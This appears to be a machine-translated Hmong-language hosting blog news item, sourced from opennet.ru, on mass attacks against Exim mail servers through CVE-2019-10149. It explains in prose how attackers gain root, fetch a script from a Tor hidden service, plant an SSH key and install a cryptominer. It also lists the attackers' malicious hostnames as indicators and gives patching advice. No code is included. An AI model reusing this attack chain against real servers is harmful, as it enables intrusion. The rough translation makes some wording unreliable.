ProHoster > Блог > xov xwm hauv internet > Kev tawm tsam loj heev ntawm qhov tsis zoo ntawm Exim-based mail servers

Kev tawm tsam loj heev ntawm qhov tsis zoo ntawm Exim-based mail servers

Cov kws tshawb fawb txog kev nyab xeeb los ntawm Cybereason ceeb toom mail server cov thawj coj txog kev txheeb xyuas qhov kev tawm tsam loj heev uas siv los siv tseem ceeb heev vulnerability (CVE-2019-10149) hauv Exim, nrhiav tau lub lim tiam dhau los. Thaum lub sijhawm tawm tsam, cov neeg tawm tsam tau ua tiav lawv cov cai nrog cov cai hauv paus thiab nruab malware ntawm lub server rau mining cryptocurrencies.

Raws li Lub Rau Hli automated kev soj ntsuam Exim qhov sib koom yog 57.05% (ib xyoos dhau los 56.56%), Postfix yog siv rau 34.52% (33.79%) ntawm cov xa ntawv xa ntawv, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%). Los ntawm muab Cov kev pabcuam Shodan tseem muaj peev xwm ua rau muaj kev cuam tshuam ntau dua 3.6 lab xa ntawv servers ntawm lub ntiaj teb network uas tsis tau hloov kho rau qhov kev tso tawm tam sim no ntawm Exim 4.92. Kwv yees li 2 lab cov servers uas muaj qhov tsis zoo nyob hauv Tebchaws Meskas, 192 txhiab hauv Russia. Los ntawm ntaub ntawv Lub tuam txhab RiskIQ twb hloov mus rau version 4.92 ntawm 70% ntawm cov servers nrog Exim.

Kev tawm tsam loj heev ntawm qhov tsis zoo ntawm Exim-based mail servers

Cov thawj coj tau qhia kom ceev nrooj nruab qhov hloov tshiab uas tau npaj los ntawm cov khoom siv faib tawm lub lim tiam dhau los (Debian, Ubuntu, openSUSE, Arch Linux, Fedora, EPEL rau RHEL/CentOS). Yog tias lub kaw lus muaj qhov tsis zoo ntawm Exim (los ntawm 4.87 txog 4.91 suav nrog), koj yuav tsum xyuas kom meej tias lub kaw lus tsis tau raug cuam tshuam los ntawm kev tshuaj xyuas crontab rau kev hu xov tooj tsis txaus ntseeg thiab xyuas kom meej tias tsis muaj cov yuam sij ntxiv hauv / hauv paus /. ssh npe. Kev tawm tsam kuj tseem tuaj yeem qhia tau los ntawm qhov muaj nyob hauv firewall cav ntawm kev ua los ntawm cov tswv an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io thiab an7kmd2wp4xo7hpr.onion.sh, uas yog siv los rub tawm malware.

Thawj zaug sim tawm tsam Exim servers kaw tseg lub 9 hli. Thaum Lub Rau Hli 13 tawm tsam tau lees txais pawg tus cwj pwm. Tom qab siv qhov tsis zoo los ntawm tor2web gateways, ib tsab ntawv raug rub tawm los ntawm Tor zais kev pabcuam (an7kmd2wp4xo7hpr) uas kuaj xyuas qhov muaj OpenSSH (yog tias tsis yog. teeb), hloov nws cov chaw (tso cai hauv paus ID nkag mus thiab qhov tseem ceeb authentication) thiab teev tus neeg siv rau hauv paus RSA key, uas muab txoj cai nkag mus rau qhov system ntawm SSH.

Tom qab teeb tsa lub backdoor, lub chaw nres nkoj scanner tau teeb tsa rau ntawm lub kaw lus txhawm rau txheeb xyuas lwm cov servers tsis zoo. Lub kaw lus tseem tab tom tshawb nrhiav cov tshuab mining uas twb muaj lawm, uas raug tshem tawm yog tias pom. Thaum kawg, koj tus kheej miner tau rub tawm thiab sau npe hauv crontab. Cov miner tau rub tawm los ntawm kev siv cov ntaub ntawv ico (qhov tseeb nws yog zip archive nrog lo lus zais "tsis muaj lo lus zais"), uas muaj cov ntaub ntawv ua tiav hauv ELF hom rau Linux nrog Glibc 2.7+.

Tau qhov twg los: opennet.ru

Ntxiv ib saib